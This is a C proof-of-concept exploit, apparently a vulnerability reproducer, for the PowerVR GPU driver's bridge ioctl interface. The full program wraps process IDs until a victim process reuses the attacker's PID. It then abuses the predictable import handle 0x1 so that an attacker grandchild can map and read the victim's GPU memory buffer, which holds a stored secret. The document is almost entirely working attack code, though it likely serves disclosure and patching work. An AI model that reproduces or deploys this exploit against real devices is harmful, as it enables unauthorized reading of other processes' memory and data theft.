#define _GNU_SOURCE
#include <unistd.h>
#include <err.h>
#include <stdbool.h>
#include <signal.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <sys/prctl.h>
#include <sys/eventfd.h>
#include <sys/ioctl.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})


struct drm_pvr_srvkm_cmd {
  uint32_t bridge_id;
  uint32_t bridge_func_id;
  uint64_t in_data_ptr;
  uint64_t out_data_ptr;
  uint32_t in_data_size;
  uint32_t out_data_size;
};
#define DRM_IOCTL_PVR_SRVKM_CMD 0xc0206440

static int gpu_fd;
static int driver_cmd(int bridge_id, int bridge_func_id, void *in_data, void *out_data, int in_size, int out_size) {
  struct drm_pvr_srvkm_cmd cmd = {
    .bridge_id = bridge_id,
    .bridge_func_id = bridge_func_id,
    .in_data_ptr = (unsigned long)in_data,
    .out_data_ptr = (unsigned long)out_data,
    .in_data_size = in_size,
    .out_data_size = out_size
  };
  return ioctl(gpu_fd, DRM_IOCTL_PVR_SRVKM_CMD, &cmd);
}
#define do_driver_cmd_noerror(bridge_id, bridge_func_id) ({                                \
    SYSCHK(driver_cmd((bridge_id), (bridge_func_id), &in, &out, sizeof(in), sizeof(out))); \
})
#define do_driver_cmd(bridge_id, bridge_func_id) ({                                        \
    do_driver_cmd_noerror((bridge_id), (bridge_func_id));                                  \
    if (out.eError != 0) errx(1, #bridge_func_id " eError %u", out.eError);                \
})

#define __packed __attribute__((packed))
typedef void *IMG_HANDLE;
typedef uint64_t IMG_DEVMEM_SIZE_T;
typedef uint64_t IMG_DEVMEM_ALIGN_T;


#define PVRSRV_BRIDGE_MM 6
#define PVRSRV_BRIDGE_MM_PHYSMEMNEWRAMBACKEDLOCKEDPMR 10
typedef struct PVRSRV_BRIDGE_IN_PHYSMEMNEWRAMBACKEDLOCKEDPMR_TAG
{
        uint64_t uiSize;
        uint64_t uiChunkSize;
        uint32_t ui32NumPhysChunks;
        uint32_t ui32NumVirtChunks;
        uint32_t *pui32MappingTable;
        uint32_t ui32Log2PageSize;
        uint32_t uiFlags;
        uint32_t ui32AnnotationLength;
        const char *puiAnnotation;
        uint32_t ui32PID;
        uint32_t ui32PDumpFlags;
} __packed PVRSRV_BRIDGE_IN_PHYSMEMNEWRAMBACKEDLOCKEDPMR;
typedef struct PVRSRV_BRIDGE_OUT_PHYSMEMNEWRAMBACKEDLOCKEDPMR_TAG
{
        IMG_HANDLE hPMRPtr;
        int eError;
} __packed PVRSRV_BRIDGE_OUT_PHYSMEMNEWRAMBACKEDLOCKEDPMR;

#define PVRSRV_BRIDGE_MM_PMRMAKELOCALIMPORTHANDLE     3
typedef struct PVRSRV_BRIDGE_IN_PMRMAKELOCALIMPORTHANDLE_TAG
{
  IMG_HANDLE hBuffer;
} __packed PVRSRV_BRIDGE_IN_PMRMAKELOCALIMPORTHANDLE;
typedef struct PVRSRV_BRIDGE_OUT_PMRMAKELOCALIMPORTHANDLE_TAG
{
  IMG_HANDLE hExtMem;
  int eError;
} __packed PVRSRV_BRIDGE_OUT_PMRMAKELOCALIMPORTHANDLE;

#define PVRSRV_BRIDGE_MM_PMRLOCALIMPORTPMR      6
typedef struct PVRSRV_BRIDGE_IN_PMRLOCALIMPORTPMR_TAG
{
  IMG_HANDLE hExtHandle;
} __packed PVRSRV_BRIDGE_IN_PMRLOCALIMPORTPMR;
typedef struct PVRSRV_BRIDGE_OUT_PMRLOCALIMPORTPMR_TAG
{
  IMG_HANDLE hPMR;
  IMG_DEVMEM_SIZE_T uiSize;
  IMG_DEVMEM_ALIGN_T sAlign;
  int eError;
} __packed PVRSRV_BRIDGE_OUT_PMRLOCALIMPORTPMR;


#define PVRSRV_BRIDGE_SYNC 2
#define PVRSRV_BRIDGE_SYNC_ALLOCSYNCPRIMITIVEBLOCK 0
typedef struct PVRSRV_BRIDGE_IN_ALLOCSYNCPRIMITIVEBLOCK_TAG
{
        /*uint32_t ui32EmptyStructPlaceholder;*/
} __packed PVRSRV_BRIDGE_IN_ALLOCSYNCPRIMITIVEBLOCK;
typedef struct PVRSRV_BRIDGE_OUT_ALLOCSYNCPRIMITIVEBLOCK_TAG
{
        IMG_HANDLE hSyncHandle;
        uint32_t ui32SyncPrimVAddr;
        uint32_t ui32SyncPrimBlockSize;
        IMG_HANDLE hhSyncPMR;
        int eError;
} __packed PVRSRV_BRIDGE_OUT_ALLOCSYNCPRIMITIVEBLOCK;


void victim_main(void) {
  gpu_fd = SYSCHK(open("/dev/dri/renderD128", O_RDWR));

  IMG_HANDLE export_handle;
  {
    PVRSRV_BRIDGE_IN_ALLOCSYNCPRIMITIVEBLOCK in = {};
    PVRSRV_BRIDGE_OUT_ALLOCSYNCPRIMITIVEBLOCK out;
    do_driver_cmd(PVRSRV_BRIDGE_SYNC, PVRSRV_BRIDGE_SYNC_ALLOCSYNCPRIMITIVEBLOCK);
    export_handle = out.hhSyncPMR;
  }
  printf("[victim] created export handle %p\n", export_handle);
  IMG_HANDLE import_handle;
  {
    PVRSRV_BRIDGE_IN_PMRMAKELOCALIMPORTHANDLE in = { .hBuffer = export_handle };
    PVRSRV_BRIDGE_OUT_PMRMAKELOCALIMPORTHANDLE out;
    do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_PMRMAKELOCALIMPORTHANDLE);
    import_handle = out.hExtMem;
  }
  printf("[victim] created import handle %p\n", import_handle);
  if (import_handle != (void*)0x1)
    errx(1, "[victim] got unexpected import handle");
  IMG_HANDLE pmr;
  {
    PVRSRV_BRIDGE_IN_PMRLOCALIMPORTPMR in = { .hExtHandle = import_handle };
    PVRSRV_BRIDGE_OUT_PMRLOCALIMPORTPMR out;
    do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_PMRLOCALIMPORTPMR);
    pmr = out.hPMR;
  }
  printf("[victim] imported as PMR %p\n", pmr);
  char *map = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, gpu_fd, (unsigned long)pmr << 12));
  strcpy(map, "SECRET VALUE");
  printf("[victim] stored secret value in PMR\n");
}

void attacker_main(int continue_fd, int done_fd) {
  gpu_fd = SYSCHK(open("/dev/dri/renderD128", O_RDWR));

  pid_t attacker_grandchild = SYSCHK(fork());
  if (attacker_grandchild == 0) {
    char dummy;
    SYSCHK(read(continue_fd, &dummy, 1));

    IMG_HANDLE pmr;
    {
      PVRSRV_BRIDGE_IN_PMRLOCALIMPORTPMR in = { .hExtHandle = (void*)0x1 };
      PVRSRV_BRIDGE_OUT_PMRLOCALIMPORTPMR out;
      do_driver_cmd_noerror(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_PMRLOCALIMPORTPMR);
      if (out.eError != 0)
        errx(1, "[attacker_grandchild] PVRSRV_BRIDGE_MM_PMRLOCALIMPORTPMR eError %u - bug might be fixed", out.eError);
      printf("[attacker_grandchild] PVRSRV_BRIDGE_MM_PMRLOCALIMPORTPMR worked, seems vulnerable...\n");
      pmr = out.hPMR;
    }
    printf("[attacker_grandchild] imported as PMR %p\n", pmr);

    char *attacker_map = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, gpu_fd, (unsigned long)pmr << 12));
    printf("[attacker_grandchild] managed to map victim's stolen PMR!\n");
    printf("[attacker_grandchild] stolen PMR contains data: '%s'\n", attacker_map);
    SYSCHK(write(done_fd, "\0", 1));
    exit(0);
  }
  exit(0);
}

int main(void) {
  setbuf(stdout, NULL);
  setbuf(stderr, NULL);

  int wstatus;
  pid_t parent_pid = getpid();

  int attacker_continue_pipe[2];
  SYSCHK(pipe(attacker_continue_pipe));
  int attacker_done_pipe[2];
  SYSCHK(pipe(attacker_done_pipe));

  pid_t child_attacker = SYSCHK(fork());
  if (child_attacker == 0) {
    close(attacker_continue_pipe[1]);
    close(attacker_done_pipe[0]);
    attacker_main(attacker_continue_pipe[0], attacker_done_pipe[1]);
    return 0;
  }
  close(attacker_continue_pipe[0]);
  close(attacker_done_pipe[1]);
  SYSCHK(waitpid(child_attacker, &wstatus, 0));
  printf("[parent] attacker child (pid %d) exited\n", child_attacker);
  printf("[parent] wrapping pid for victim will take a while (restart the reproducer if this takes more than a few minutes)...\n");

  while (true) {
    pid_t child_victim = SYSCHK(fork());
    if (child_victim == 0) {
      if (getpid() != child_attacker)
        exit(0);

      printf("[victim] running with reused pid\n");
      victim_main();
      exit(0);
    }
    SYSCHK(waitpid(child_victim, &wstatus, 0));
    if (child_victim == child_attacker)
      break;
  }
  printf("[parent] victim child exited, waking attacker grandchild\n");
  SYSCHK(write(attacker_continue_pipe[1], "\0", 1));
  char dummy;
  SYSCHK(read(attacker_done_pipe[0], &dummy, 1));
}